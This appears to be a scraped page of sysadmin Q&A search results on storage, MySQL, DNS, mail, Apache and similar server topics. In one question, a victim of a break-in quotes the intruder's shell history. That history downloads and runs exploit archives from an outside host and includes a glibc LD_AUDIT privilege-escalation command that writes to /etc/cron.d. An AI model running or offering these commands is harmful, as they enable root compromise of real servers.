Search Results

Search found 10384 results on 416 pages for 'plan cache'.


  • VMware NAS/iSCSI recommendations - smallish organization

    - by Bubnoff
    I have two VMware servers (ESX + ESXi) and two backup NAS boxes. The current NAS boxes are low-cost and unsuitable for running VMs from: they support NFS only and are slow. My plan is to have a dedicated iSCSI/NAS box for storing and running VMs, plus two additional low-cost boxes for backup. I'm looking for advice on two things, really:

    1. Recommendations on VMware architecture/design for a smaller organization: fewer than 20 virtual machines, 2 servers + 2 x 1.5 TB backup NAS boxes.
    2. A good NAS/iSCSI box, with your recommendation on RAID config (I would go with RAID 6 or better).

    I'm trying to design an installation that is both fast and reliable/redundant. If you have any experiences to share, or your current configuration including network design (switches, fiber, etc.), I will be enormously thankful. I'm not married to this idea, so if you have a design that doesn't use iSCSI NAS boxes, let 'er rip. Cost? Can we stay around $5,000 (on top of the already stated components)? Links to info are welcome also. Thanks for reading! Bubnoff

    Read the article

  • Copy files from subdirectories into one directory.

    - by Derek Organ
    OK, I have a bunch of files in this file structure:

        /backup/daily/database1/database1-2011-01-01.sql
        /backup/daily/database1/database1-2011-01-02.sql
        /backup/daily/database1/database1-2011-01-03.sql
        /backup/daily/database1/database1-2011-01-04.sql
        /backup/daily/database1/database1-2011-01-05.sql
        /backup/daily/database1/database1-2011-01-06.sql
        /backup/daily/database1/database1-2011-01-07.sql
        /backup/daily/anotherdb/anotherdb-2011-01-01.sql
        /backup/daily/anotherdb/anotherdb-2011-01-02.sql
        /backup/daily/anotherdb/anotherdb-2011-01-03.sql
        /backup/daily/anotherdb/anotherdb-2011-01-04.sql
        /backup/daily/anotherdb/anotherdb-2011-01-05.sql
        /backup/daily/anotherdb/anotherdb-2011-01-06.sql
        /backup/daily/anotherdb/anotherdb-2011-01-07.sql
        /backup/daily/stuff/stuff-2011-01-01.sql
        /backup/daily/stuff/stuff-2011-01-02.sql
        /backup/daily/stuff/stuff-2011-01-03.sql
        /backup/daily/stuff/stuff-2011-01-04.sql
        /backup/daily/stuff/stuff-2011-01-05.sql
        /backup/daily/stuff/stuff-2011-01-06.sql
        /backup/daily/stuff/stuff-2011-01-07.sql

    And there are lots, lots more. Ultimately I want to import all the 2011-01-07.sql files into my MySQL database. This works for one:

        mysql -u root -ppassword < /backup/daily/database1/database1-2011-01-07.sql

    That will nicely restore that database from the backup file. I want to run a process that does this for all databases. So my plan is to first cp all 2011-01-07 SQL files into a tmp dir, e.g.:

        cp /backup/daily/*/*2011-01-07*.sql /tmp/all

    The command above unfortunately isn't working; I get an error:

        cp: cannot stat ..... No such file or directory

    So can you guys help me out with this? For bonus points, if you can tell me how to do the next step, importing all those databases one at a time with one command, that would be great too. I really want to do these as two separate steps because I need to delete a few SQL files manually from the tmp dir before I run the restore command. So I need: 1) a command to copy all 2011-01-07 SQL files to a tmp dir, and 2) a command to import all the files in that dir into MySQL. I know it's possible to do this in one step, but for lots of reasons I'd really prefer to do it in two.
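    A sketch of the two steps, assuming the filenames always follow the name-YYYY-MM-DD.sql pattern shown above (deriving the database name from the prefix before the date is an assumption):

        # Step 1: collect the matching dumps into a staging dir
        mkdir -p /tmp/all
        find /backup/daily -type f -name '*-2011-01-07.sql' -exec cp {} /tmp/all/ \;

        # ... manually prune /tmp/all here ...

        # Step 2: import each remaining file into the database named by its prefix
        for f in /tmp/all/*.sql; do
            db=$(basename "$f" | sed 's/-[0-9]\{4\}-[0-9]\{2\}-[0-9]\{2\}\.sql$//')
            mysql -u root -ppassword "$db" < "$f"
        done

    If a dump already contains its own CREATE DATABASE/USE header, the explicit database argument is harmless; if not, the target database must exist before the import.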

    Read the article

  • MySQL is killing the server IO.

    - by OneOfOne
    I manage a fairly large/busy vBulletin forum (running on the Gigenet cloud). The database is ~10 GB (~9 million posts, ~60 queries per second), and lately MySQL has been grinding the disk like there's no tomorrow according to iotop, slowing the site. The last idea I can think of is using replication, but I'm not sure how much that would help, and I'm worried about database sync. I'm out of ideas; any tips on how to improve the situation would be highly appreciated.

    Specs: Debian Lenny 64-bit, ~12Ghz (6 cores) CPU, 7520gb RAM, 160 GB disk. Kernel: 2.6.32-4-amd64. mysqld Ver 5.1.54-0.dotdeb.0 for debian-linux-gnu on x86_64 ((Debian)).

    Other software: vBulletin 3.8.4, memcached 1.2.2, PHP 5.3.5-0.dotdeb.0 (fpm-fcgi) (built: Jan 7 2011 00:07:27), lighttpd/1.4.28 (ssl). PHP and vBulletin are configured to use memcached.

    MySQL settings:

        [mysqld]
        key_buffer = 128M
        max_allowed_packet = 16M
        thread_cache_size = 8
        myisam-recover = BACKUP
        max_connections = 1024
        query_cache_limit = 2M
        query_cache_size = 128M
        expire_logs_days = 10
        max_binlog_size = 100M
        key_buffer_size = 128M
        join_buffer_size = 8M
        tmp_table_size = 16M
        max_heap_table_size = 16M
        table_cache = 96

    Other:

        > vmstat
        procs -----------memory---------- ---swap-- -----io---- -system-- ----cpu----
         r  b   swpd   free  buff   cache   si  so  bi  bo  in  cs us sy id wa
         9  0  73140  36336  8968 1859160    0   0  42  15   3   2  6  1 89  5

        > /etc/init.d/mysql status
        Threads: 49  Questions: 252139  Slow queries: 164  Opens: 53573
        Flush tables: 1  Open tables: 337  Queries per second avg: 61.302

    Edit: additional info below.
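    As a diagnostic aside: with 164 slow queries already counted above, the slow query log is the usual first stop for finding what is grinding the disk. A minimal sketch for the [mysqld] section (MySQL 5.1 variable names; the 1-second threshold is an arbitrary example):

        slow_query_log = 1
        slow_query_log_file = /var/log/mysql/mysql-slow.log
        long_query_time = 1
        log_queries_not_using_indexes = 1

    Running mysqldumpslow on the resulting file summarizes the worst offenders.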

    Read the article

  • Software/hardware to build video streaming server?

    - by Sasha Yanovets
    I am looking for a video streaming server solution, something like an online TV server, with the ability to make live broadcasts on the internet. What software could you recommend for that? What kind of hardware should it run on, and does it need anything special? I am looking for a solution that could be scaled up to at least 1000 simultaneous users online with good video resolution. I think a general answer on what direction to choose is useful, but here are more details on my specific case: I am looking for a solution almost from scratch. We have some video content that we've produced, but it is not delivered over the internet yet. We are not tied to any particular vendor for now. We want to stream 24 hours a day: three 8-hour blocks, with a change of content every day. We want the ability to make regular live broadcasts. I guess we will need several streaming-quality options (low ~56 kb/s, mid ~273 kb/s). Some terms are just foreign to me (like play-truncation rate); if you could point out what parameters we should be aware of, that would be great. Uplink to the internet is to be determined. We plan to start with something and scale up along the way. If you already have some kind of media streaming server, just describe its configuration here (hardware, OS, software) and the peak number of concurrent users it serves. I think that could help people approaching this task.
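    A quick capacity check on the uplink, using the stream rates above (pure arithmetic, ignoring protocol overhead): 1000 simultaneous viewers at the mid bitrate of ~273 kb/s works out to roughly 273 Mb/s of sustained outbound bandwidth (1000 x 273 kb/s), and even the low-quality stream alone needs ~56 Mb/s. Whatever platform gets chosen, the uplink tends to be the first hard constraint.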

    Read the article

  • Apache in OS X not displaying localhost nor vhosts correctly

    - by Marcus
    I've encountered a really odd problem in my development environment, and I really can't make any sense of it. It started when a locally developed PHP site refused to update any content I edited in a file. So if the document was:

        <h2>Hello!</h2>

    and I edited it to

        <h2>What's wrong?!</h2>

    it still output <h2>Hello!</h2>. I thought it was some kind of caching problem, but neither "hard reloads" in the browser nor sudo apachectl -k restart sorted it out. Only a restart of my Mac finally fixed it. Now, a few days later, even stranger issues are appearing. I have a LAMP stack installed via Homebrew. In httpd-vhosts.conf I've set ~/Dev/ as my localhost document root, and I set up a <VirtualHost *:80> for each project ("ServerName projectname.dev", for example). However, whatever files or folders I put in ~/Dev/ have stopped showing up on localhost, and new VirtualHost directives don't work. There are three projects + "docs" in the folder, but "localhost" only displays the two older projects...? So, as I've said, I've tried restarting Apache (without errors), clearing browser caches (tried in three browsers: Chrome, Safari and Firefox) and even rebooting the Mac. Nothing. Any ideas? Running OS X 10.8.5 and Apache 2.2.24.
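    One way to sanity-check a setup like this, sketched in shell (assuming the Homebrew httpd is the one on PATH):

        # List the vhosts Apache actually parsed, and from which config file
        apachectl -S

        # A classic culprit: the OS X system Apache running alongside the
        # Homebrew one on the same port
        ps aux | grep [h]ttpd
        httpd -V | grep -i server_config_file

        # Validate syntax before restarting
        apachectl configtest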

    Read the article

  • Moving my OpenID from Livejournal to... something else.

    - by T-Boy
    I've actually been an early user of OpenID, although there are still some questions about OpenID that I've never had satisfactorily answered. Now, I understand that if I have full control over my domain, I can set it up to delegate the task of authenticating to another OpenID service provider. The problem is that what I'd like to do is get the Livejournal server to pass the authentication to someone else, instead of having LJ do it. Preferably, I'd like Livejournal, when asked by an authenticating provider, to say, "No, I don't do this anymore -- go to this address". The plan was that this address would be in a domain I fully control, which would then pass it on to whichever service provider I choose. I don't even know if I've got my understanding of OpenID right, if all these shenanigans are necessary, if my question makes sense, or if it's even possible with a service provider like Livejournal. (I tried tagging this with livejournal, and it told me I couldn't because I don't have enough reputation. Oh well; one must start somewhere. Sorry for the inconvenience!)
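    For the half that is under your control, OpenID delegation from your own domain is just two link tags served from your identity URL. A sketch with placeholder provider URLs (this is the OpenID 1.1 form; OpenID 2.0 uses openid2.provider/openid2.local_id instead):

        # Write the delegation tags into the page served at your identity URL
        cat > index.html <<'EOF'
        <html><head>
        <link rel="openid.server" href="https://provider.example/openid/endpoint">
        <link rel="openid.delegate" href="https://provider.example/your-identity">
        </head><body>My identity page</body></html>
        EOF

    This doesn't make Livejournal forward anything, of course; that half of the question stands.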

    Read the article

  • VMWare Setup with 2 Servers and a DAS (DELL MD3220)

    - by Kumala
    I am planning a VMware-based setup consisting of two VMware servers (2 CPUs, 256 GB memory each) and a DAS (Dell MD3220 with 24 x 900 GB disks). Half of the virtual machines will run MS SQL databases (application, SharePoint, BI); the other half will be file services and IIS. To expand the storage capacity, we'll be adding an MD1220 enclosure with another 24 x 900 GB disks to the MD3220. Both DAS will have 2 controllers. Our current measured load is 1000 IOPS average, 7000 IOPS peak (peaks happen maybe twice per hour). We are in the planning phase now and are looking at the proper setup of the disks. The intention is to set up one of the DAS with RAID 10 only and the other DAS with RAID 5. That will allow us to put each application on the DAS that best supports its performance needs. The question is how best to partition the two DAS units to get the best possible IOPS/MBps; each DAS will have to have 2 hot spares.

    For the RAID 5 setup: generally speaking, would it be better to have one single disk group across all 22 disks (24 minus 2 hot spares) with both controllers assigned to the one disk group, or is it better to have 2 disk groups of 11 disks each, one assigned to each of the two controllers?

    Same question for the RAID 10 setup. The plan is: 2 disks for logs (RAID 1), 2 hot spares and 20 disks for RAID 10. Option 1: 5 groups of 4 disks (RAID 10), with two groups assigned to one controller and three groups to the other. Option 2: one large RAID 10 across all the disks, with both controllers assigned to the same group. I would assume that there is no right or wrong, but that it all depends very much on the specific application behaviour, so I am looking for some general ideas on the pros and cons of the different options. If there are other meaningful options, feel free to propose them.
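    As background for weighing the two layouts: the usual back-of-the-envelope formula is backend IOPS = reads + (writes x write penalty), with a penalty of 4 for RAID 5 and 2 for RAID 10. Assuming, purely for illustration, a 70/30 read/write split on the 7000 IOPS peak:

        RAID 5:  (7000 x 0.7) + (7000 x 0.3 x 4) = 4900 + 8400 = 13300 backend IOPS
        RAID 10: (7000 x 0.7) + (7000 x 0.3 x 2) = 4900 + 4200 =  9100 backend IOPS

    The real split has to come from your own measurements, but this is why write-heavy databases usually land on the RAID 10 side.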

    Read the article

  • Problems forwarding zone to another DNS server.

    - by sebastian nielsen
    I have an authoritative DNS server at 83.248.21.18 which is authoritative for the domain "finahemgoteborg.se". Now my registrar requires me to have 2 DNS servers for the domain, so I would like the machine 85.228.103.141 to simply forward all incoming queries for "finahemgoteborg.se" to the 83.248.21.18 server. In the 85.228.103.141 BIND server, I have the following config:

        zone "finahemgoteborg.se" in {
            type forward;
            forwarders { 83.248.21.18; };
        };

    But the problem is that 85.228.103.141 still responds with "REFUSED" when querying it, for example for the www.finahemgoteborg.se A record. How can I fix it? I do NOT want to set up a master/slave situation, just one nameserver that forwards to another.

    Edit: the rest of named.conf:

        options {
            directory "/var/cache/bind";
            version "none";
            allow-recursion { "none"; };
            minimal-responses no;
        };

        zone "sebn.us.to" in {
            type master;
            file "/etc/bind/sebn.us.to";
        };

        zone "ns1sebn.us.to" in {
            type master;
            file "/etc/bind/sebn.us.to";
        };

        zone "ns2sebn.us.to" in {
            type master;
            file "/etc/bind/sebn.us.to";
        };

        zone "finahemgoteborg.se" in {
            type forward;
            forwarders { 83.248.21.18; };
        };

    Read the article

  • getent passwd fails, getent group works?

    - by slugman
    I've almost got my AD integration working completely on my OpenSUSE 12.1 server. I have an OpenSUSE 11.4 system successfully integrated into our AD environment (meaning we use LDAP to authenticate against the AD directory via Kerberos, so we can log in to our *nix systems as AD users, using the name service caching daemon to cache passwords and groups). Also important to note: these systems are on our LAN, and SSL authentication is disabled. I am almost all the way there. nss_ldap is finally authenticating with the LDAP server (as /var/log/messages shows), but now I have another problem: getent passwd and getent shadow fail (they show local accounts only), but getent group works! getent group shows all my AD groups! I copied over the relevant configuration files from my working OpenSUSE 11.4 box:

        /etc/krb5.conf
        /etc/nsswitch.conf
        /etc/nscd.conf
        /etc/samba/smb.conf
        /etc/sssd/sssd.conf
        /etc/pam.d/common-session-pc
        /etc/pam.d/common-account-pc
        /etc/pam.d/common-auth-pc
        /etc/pam.d/common-password-pc

    I didn't modify anything between the two. I really don't think I need to modify anything, because getent passwd, getent shadow, and getent group all work fine on the OpenSUSE 11.4 box. Restarting the nscd service unfortunately didn't do much, and neither did running /usr/sbin/nscd -i passwd. Do any of you admin gurus have any suggestions? Honestly, I'm happy I made it this far. I'm almost there, guys!
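    For what it's worth, this passwd-vs-group asymmetry usually lives in one file. A sketch of the relevant /etc/nsswitch.conf lines (the "compat ldap" sources are an assumption, not copied from the box in question):

        passwd: compat ldap
        group:  compat ldap
        shadow: compat ldap

    If passwd or shadow lists a different source than group, getent shows exactly this split behaviour.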

    Read the article

  • I cannot access Windows Update at all

    - by Cardinal fang
    I have been unable to access the Windows Update site for a couple of weeks now. I just get a message saying "Internet Explorer cannot display the webpage" and telling me I have connection problems. The same thing happens with any other Microsoft site I try to access. Automatic Updates also do not work. I can access every other website I've surfed to. I've tried Googling the problem, and based on what other sites have suggested I have cleared my cache and temp files. I've scanned my hard drive with my antivirus in case I have a virus (nada). I've tried turning off my firewall and antivirus (I run ZoneAlarm). I've downloaded Spybot and scanned my drive with that in case something was missed by ZoneAlarm (again nada). Based on suggestions from the smart cookies on the Bad Science forum, I've used nslookup to check my name resolution isn't wonky (got all the info they said I should get). I've also tried navigating there directly using the IP address I was given (nope). I normally access the internet through a 3 mobile broadband connection, but I have also tried connecting over a mate's wi-fi connection in case it was something on my mobile modem interfering. I run Windows XP SP3 with Internet Explorer 7 and ZoneAlarm Internet Security Suite as my antivirus/firewall. Any suggestions?

    Read the article

  • Ubuntu Server hack

    - by haxpanel
    Hi! I looked at netstat and noticed that someone besides me is connected to the server by SSH. I looked into this because my user should have the only SSH access. I found this in an FTP user's .bash_history file:

        w
        uname -a
        ls -a
        sudo su
        wget qiss.ucoz.de/2010/.jpg
        wget qiss.ucoz.de/2010.jpg
        tar xzvf 2010.jpg
        rm -rf 2010.jpg
        cd 2010/
        ls -a
        ./2010
        ./2010x64
        ./2.6.31
        uname -a
        ls -a
        ./2.6.37-rc2
        python rh2010.py
        cd ..
        ls -a
        rm -rf 2010/
        ls -a
        wget qiss.ucoz.de/ubuntu2010_2.jpg
        tar xzvf ubuntu2010_2.jpg
        rm -rf ubuntu2010_2.jpg
        ./ubuntu2010-2
        ./ubuntu2010-2
        ./ubuntu2010-2
        cat /etc/issue
        umask 0
        dpkg -S /lib/libpcprofile.so
        ls -l /lib/libpcprofile.so
        LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
        ping
        gcc
        touch a.sh
        nano a.sh
        vi a.sh
        vim
        wget qiss.ucoz.de/ubuntu10.sh
        sh ubuntu10.sh
        nano ubuntu10.sh
        ls -a
        rm -rf ubuntu10.sh
        . .. a.sh .cache ubuntu10.sh ubuntu2010-2
        ls -a
        wget qiss.ucoz.de/ubuntu10.sh
        sh ubuntu10.sh
        ls -a
        rm -rf ubuntu10.sh
        wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe
        rm -rf W2Ksp3.exe
        passwd

    The system is in a jail. Does that matter in this case? What shall I do? Thanks, everyone! So far I have done the following:

        - banned the connected SSH host with iptables
        - stopped the sshd in the jail
        - saved: .bash_history, syslog, dmesg, and the files fetched by the wget lines in the history

    Read the article

  • What are the problems and pitfalls of a public-facing Active Directory?

    - by Ralph Shillington
    The situation I'm faced with is this: we plan on using a number of server applications hosted on Amazon EC2 machines, mainly Microsoft Team Foundation Server. These services rely heavily on Active Directory. Since our servers are in the Amazon cloud, it should go without saying (but I will) that all our users are remote. It seems that we can't set up a VPN on our EC2 instance, so the users will have to join the domain directly over the internet. Then they'll be able to authenticate and, once authenticated, use that token for accessing resources such as TFS. On the DC instance, I can shut down all ports except those needed for joining/authenticating to the domain. I can also filter the IPs on that machine to just the addresses we expect our users to be at (it's a small group). On the web-based application servers, I imagine all we need to open is port 80 (or 8080 in the case of TFS). One of the problems I'm faced with is what domain name to use for this Active Directory. Should I go with "ourDomainName.com" or "ourDomainName.local"? If I choose the latter, does that not mean I'll have to get all our users to change their DNS address to point to our server so it can resolve the domain name (I guess I could also distribute a hosts file)? Perhaps there is another alternative that I'm completely missing.

    Read the article

  • Why do you use a 3PAR SAN? [closed]

    - by Starfish
    If you use a 3PAR SAN, I'd like to hear what you think about it, particularly compared to the HP EVA. What do you see as its advantages over other SANs like the EVA? What's so special about the ASIC? We had HP quote us an EVA P6500 and a 3PAR V400 with equivalent storage, and the 3PAR was nearly twice the cost. My site has two EVA SANs with a combined capacity of ~80 TB. We want to replace the older and larger of the two, and we've been looking at the EVA and the 3PAR to see which would be a better fit for us. I'm struggling to understand how the 3PAR differs from the EVA from a practical technical standpoint. When I read the sales literature and speak with the HP sales engineers, they spend a lot of time talking about how the 3PAR is better because of its ASIC. It's ASIC this and ASIC that, but when I press them on how a 3PAR with thin provisioning is better than an EVA with thin provisioning, I can't get a straight answer. Meanwhile, one of my colleagues, who has more say regarding which SAN we get, is enamored with the 3PAR, and he can't explain clearly to me why he wants it over the EVA. Our needs are pretty simple: we have 10 servers running VMware and ~100 VMs. We use VMware's thin provisioning currently, but we would like to start using thin provisioning on the new SAN. We don't need SSDs or migration between storage tiers. We plan on having FC or SAS drives for our most-used data and SATA/FATA drives for the lesser-used data, which is how we have the EVAs configured. We also do not need any SAN-level snapshotting or replication.

    Read the article

  • How to make Project auto-estimate duration based on work?

    - by Bruno Brant
    This one has bothered me for a long while. I like to do estimates by thinking about how much work a certain task will take (I'm in the IT business), so, let's say, it takes 12 hours to build a program. Now, let's say I tell Project that my start date is today. If I allocate one resource to this task, that should mean the task lasts 1.5 days, implying that it will end tomorrow. But right now, that is not what it's doing. I say that the task will take 1 hour, and when I add a resource to it, Project allocates the resource on a [13%] basis, which means the duration is still fixed: Project is trying to make the task last a whole day. I have, on many occasions, accomplished what I want. What I do is build a plan based on these rough estimates of effort, then allocate tasks to resources. Times conflict, so I level resources, and then Project magically tells me how long, in days, it will take. But every time I have to start estimating again, I end up having trouble making Project work like that.

    Read the article

  • Replacing DropBox with: Amazon S3 + SSL + GPG/TrueCrypt + Mounting on OSX ??

    - by Matt Rogish
    So, right now we're using DropBox to share various data files between approximately 10 Mac OS X systems. However, we already have an S3 account, and putting everyone on the lowest DropBox plan of $10/mo seems too expensive. So I am contemplating something that would allow us to replace DropBox with our own home-grown solution. We are all fairly technical people and/or smart enough to follow some steps, so if it's not as "user friendly" as DropBox, we're all comfortable with that. There are plenty of docs out there with bits and pieces of what I want, but some of the tools don't seem to fit the requirements:

        1. Transport security via SSL to the bucket
        2. Encryption of bucket contents
        3. Bi-directional syncing

    Most of the scripts I can find on the internet use "duplicity", which appears to fail #1 (it doesn't look like duplicity supports SSL to S3; the docs don't say, but the protocol looks like plain old HTTP: http://www.nongnu.org/duplicity/duplicity.1.html#sect6). Many scripts use gpg to encrypt files. This seems like it could work; however, I have to make sure that each OS X client is able to use the same key to encrypt and decrypt files (key management is left to me). Finally, most of the scripts use one-way replication, e.g. using Amazon S3 as a simple backup store. As we'd be using Amazon S3 as the "repository", they fail #3. Whew. So, I'd love a single tool that does all of this, but after an exhaustive search I don't think one exists. I'd be happy just knowing which tools out there can fulfill my 3 requirements; after that I can stitch together the rest. Any thoughts? THANKS!
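    For requirements 1 and 2 in isolation, a sketch of the encrypt-then-upload half (assuming the modern AWS CLI, which talks HTTPS by default; the key ID and bucket are placeholders, and the hard part, bi-directional sync, is exactly what this doesn't solve):

        # Encrypt to a shared team key, then push
        gpg --encrypt --recipient TEAM-KEY-ID somefile.dat
        aws s3 cp somefile.dat.gpg s3://our-bucket/shared/

        # Pull and decrypt on another machine
        aws s3 cp s3://our-bucket/shared/somefile.dat.gpg .
        gpg --output somefile.dat --decrypt somefile.dat.gpg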

    Read the article

  • sendmail on Snow Leopard

    - by Jay
    I'm trying to get sendmail working on my MacBook Pro (OS 10.6.4) so that I can send mail with PHP's mail() function. (If you know how to do this without sendmail, I'd be interested in that too.) The plan is to send mail through smtp.gmail.com using my Gmail account, unless you have a better idea. I did this and that, and it didn't work. In /etc/postfix/smtp_sasl_passwords I tried both:

        smtp.yourisp.com username:password

    and

        smtp.yourisp.com username@gmail.com:password

    The problem seems to be that Google doesn't like me. I don't think my ISP is blocking it, because Mail.app can send email through smtp.gmail.com just fine. Below, $email is my Gmail address.

        $ printf "Subject: TestMail" | sendmail -f $email $email
        $ tail /var/log/mail.log
        Oct 21 19:38:18 Jays-MacBook-Pro postfix/master[8741]: daemon started -- version 2.5.5, configuration /etc/postfix
        Oct 21 19:38:18 Jays-MacBook-Pro postfix/qmgr[8743]: CAACBFA905: from=<$email>, size=377, nrcpt=1 (queue active)
        Oct 21 19:38:18 Jays-MacBook-Pro postfix/pickup[8742]: C2A68FA93A: uid=501 from=<$email>
        Oct 21 19:38:18 Jays-MacBook-Pro postfix/cleanup[8744]: C2A68FA93A: message-id=<20101021233818.$mydomain>
        Oct 21 19:38:18 Jays-MacBook-Pro postfix/qmgr[8743]: C2A68FA93A: from=<$email>, size=377, nrcpt=1 (queue active)
        Oct 21 19:38:18 Jays-MacBook-Pro postfix/smtp[8746]: initializing the client-side TLS engine
        Oct 21 19:38:18 Jays-MacBook-Pro postfix/smtp[8748]: initializing the client-side TLS engine
        Oct 21 19:38:49 Jays-MacBook-Pro postfix/smtp[8746]: connect to smtp.gmail.com[74.125.157.109]:25: Operation timed out
        Oct 21 19:38:49 Jays-MacBook-Pro postfix/smtp[8748]: connect to smtp.gmail.com[74.125.157.109]:25: Operation timed out
        Oct 21 19:38:49 Jays-MacBook-Pro postfix/smtp[8746]: CAACBFA905: to=<$email>, relay=none, delay=1334, delays=1304/0.04/30/0, dsn=4.4.1, status=deferred (connect to smtp.gmail.com[74.125.157.109]:25: Operation timed out)
        Oct 21 19:38:49 Jays-MacBook-Pro postfix/smtp[8748]: C2A68FA93A: to=<$email>, relay=none, delay=30, delays=0.08/0.05/30/0, dsn=4.4.1, status=deferred (connect to smtp.gmail.com[74.125.157.109]:25: Operation timed out)

    I also tried setting myhostname, mydomain, and myorigin in /etc/postfix/main.cf to the hostname that nslookup returns for my IP (as displayed by http://www.whatismyip.com/). And still no luck. Any ideas?
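    Worth noting: every timeout in that log is on port 25, and Gmail's relay expects the submission port instead. A commonly cited sketch for /etc/postfix/main.cf (these are standard Postfix parameter names, but treat the exact values as assumptions to verify):

        relayhost = [smtp.gmail.com]:587
        smtp_sasl_auth_enable = yes
        smtp_sasl_password_maps = hash:/etc/postfix/smtp_sasl_passwords
        smtp_sasl_security_options = noanonymous
        smtp_use_tls = yes

    The matching line in /etc/postfix/smtp_sasl_passwords would then be keyed as [smtp.gmail.com]:587 rather than a bare hostname, followed by postmap /etc/postfix/smtp_sasl_passwords and a postfix reload.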

    Read the article

  • Unable to record using JMeter

    - by krish
    Hi, I am trying to record an HTTP web page using JMeter version 2.3.3. I have set up the JMeter proxy and tried, but it didn't work. I followed the steps below:

        1. Launch JMeter 2.3.3 and add a Thread Group to the Test Plan.
        2. Under Workbench > Add > Non-Test Elements, add an HTTP Proxy Server.
        3. Proxy server settings: Port: 9090; Target: use Recording Controller; Grouping: do not group samplers; Type: HTTP request; all the boxes under the HTTP sampler settings checked.
        4. Save the settings.
        5. In the browser (IE 7.0 or Firefox 3.0.16), under connection settings, set up a manual proxy of localhost, port 9090 (no auto-detect settings, only the manual proxy). Settings saved.
        6. In JMeter, start the HTTP proxy server.
        7. Open a browser and hit the web page that needs to be tested.

    The page is not opened. In fact, because of the changes made in the browsers, no pages open at all. Whenever I try hitting a page, the requests are recorded in JMeter, but without the page opening, how can I test? I'm looking for an immediate answer, as my work is blocked. An immediate answer would be appreciated.

    Read the article

  • Need advice for choosing software/hardware for virtualization.

    - by Anatoly
    Currently we have these servers:

        1. Windows SBS 2003 Premium on an IBM X266 (dual Xeon F43, 2 GB RAM): DC, Exchange (70 users), MSSQL.
        2. Windows 2003 R2 32-bit on an IBM x3400 (dual Xeon E5310, 4 GB RAM): terminal server (40+ users), an ERP application based on the uniPaaS platform from Magicsoftware, and Pervasive SQL.
        3. Ubuntu 8.04 (simple PC box) with a Squid proxy, a GLPI system and a phpBB3 forum for internal use.

    Recently the number of concurrent users on the terminal server passed 40 in rush hours, and it gets stuck frequently. Therefore we need an upgrade. I am thinking of transferring all physical servers to virtual servers on a cluster of 2 physical hosts, to reduce downtime. I think we will grow to 50-60 concurrent terminal users in rush hours. I also plan to virtualize 10-15 Windows XP/7 workstations (office, ERP etc.), and there is a small chance we will add Asterisk/HylaFAX for 100 users (if that is possible on the same VM). We also need NAS storage of 2-3 TB. What hardware upgrade/purchase do we need to complete this task? Which VM solution is preferable, VMware or Hyper-V? What backup software should we choose, Acronis or something else? Thank you in advance.

    Read the article

  • setting up git on cygwin - openssl

    - by Pete Field
    I'm trying to get git running in Cygwin on a Windows 7 machine. I have git unpacked in the directory git-1.7.1.1. When I run make install from within that directory, I get:

            CC fast-import.o
        In file included from builtin.h:4,
                         from fast-import.c:147:
        git-compat-util.h:136:19: iconv.h: No such file or directory
        git-compat-util.h:140:25: openssl/ssl.h: No such file or directory
        git-compat-util.h:141:25: openssl/err.h: No such file or directory
        In file included from builtin.h:6,
                         from fast-import.c:147:
        cache.h:9:21: openssl/sha.h: No such file or directory
        In file included from fast-import.c:156:
        csum-file.h:10: error: parse error before "SHA_CTX"
        csum-file.h:10: warning: no semicolon at end of struct or union
        csum-file.h:15: error: 'crc32' redeclared as different kind of symbol
        /usr/include/zlib.h:1285: error: previous declaration of 'crc32' was here
        csum-file.h:15: error: 'crc32' redeclared as different kind of symbol
        /usr/include/zlib.h:1285: error: previous declaration of 'crc32' was here
        csum-file.h:17: error: parse error before '}' token
        fast-import.c: In function `store_object':
        fast-import.c:995: error: `SHA_CTX' undeclared (first use in this function)
        fast-import.c:995: error: (Each undeclared identifier is reported only once
        fast-import.c:995: error: for each function it appears in.)
        fast-import.c:995: error: parse error before "c"
        fast-import.c:1000: warning: implicit declaration of function `SHA1_Init'
        fast-import.c:1000: error: `c' undeclared (first use in this function)
        fast-import.c:1001: warning: implicit declaration of function `SHA1_Update'
        fast-import.c:1003: warning: implicit declaration of function `SHA1_Final'
        fast-import.c: At top level:
        fast-import.c:1118: error: parse error before "SHA_CTX"
        fast-import.c: In function `truncate_pack':
        fast-import.c:1120: error: `to' undeclared (first use in this function)
        fast-import.c:1126: error: dereferencing pointer to incomplete type
        fast-import.c:1127: error: dereferencing pointer to incomplete type
        fast-import.c:1128: error: dereferencing pointer to incomplete type
        fast-import.c:1128: error: `ctx' undeclared (first use in this function)
        fast-import.c: In function `stream_blob':
        fast-import.c:1140: error: `SHA_CTX' undeclared (first use in this function)
        fast-import.c:1140: error: parse error before "c"
        fast-import.c:1154: error: `pack_file_ctx' undeclared (first use in this function)
        fast-import.c:1154: error: dereferencing pointer to incomplete type
        fast-import.c:1160: error: `c' undeclared (first use in this function)
        make: *** [fast-import.o] Error 1

    I'm guessing that most of these errors are due to the iconv.h and openssl headers, which apparently are missing, but I can't figure out how I'm supposed to install those (if I am), or if there is some other way to get around this.
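    Two common ways around this, sketched (the Cygwin package names are from memory and worth confirming in setup.exe; NO_OPENSSL and NO_ICONV are knobs documented in git's own Makefile):

        # Option 1: install the missing development headers via Cygwin's setup.exe:
        #   libiconv-devel, openssl-devel (plus zlib-devel if zlib headers are absent)

        # Option 2: build git without the optional dependencies
        make NO_OPENSSL=1 NO_ICONV=1
        make NO_OPENSSL=1 NO_ICONV=1 install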

    Read the article

  • Best practices for thin-provisioning Linux servers (on VMware)

    - by nbr
    I have a setup of about 20 Linux machines, each with about 30-150 gigabytes of customer data. The size of the data will probably grow significantly faster on some machines than on others. These are virtual machines on a VMware vSphere cluster, with the disk images stored on a SAN system. I'm trying to find a solution that uses disk space sparingly while still allowing easy growth of individual machines. In theory, I would just create big disks for each machine and use thin provisioning; each disk would grow as needed. However, it seems that a 500 GB ext3 filesystem with only 50 GB of data and quite a low number of writes still easily grows the disk image to, e.g., 250 GB over time. Or maybe I'm doing something wrong here? (I was surprised how little I found on the subject with Google. BTW, there's not even a thin-provisioning tag on serverfault.com.) Currently I'm planning to create big, thin-provisioned disks, but with a small LVM volume on them. For example: a 100 GB volume on a 500 GB disk. That way I could more easily grow the LVM volume and the filesystem size as needed, even online. Now for the actual question: are there better ways to do this? (That is, to grow data size as needed without downtime.) Possible solutions include:

        - Using a thin-provisioning-friendly filesystem that tries to occupy the same spots over and over again, thus not growing the image size.
        - Finding an easy method of reclaiming free space on the partition (re-thinning?).
        - Something else?

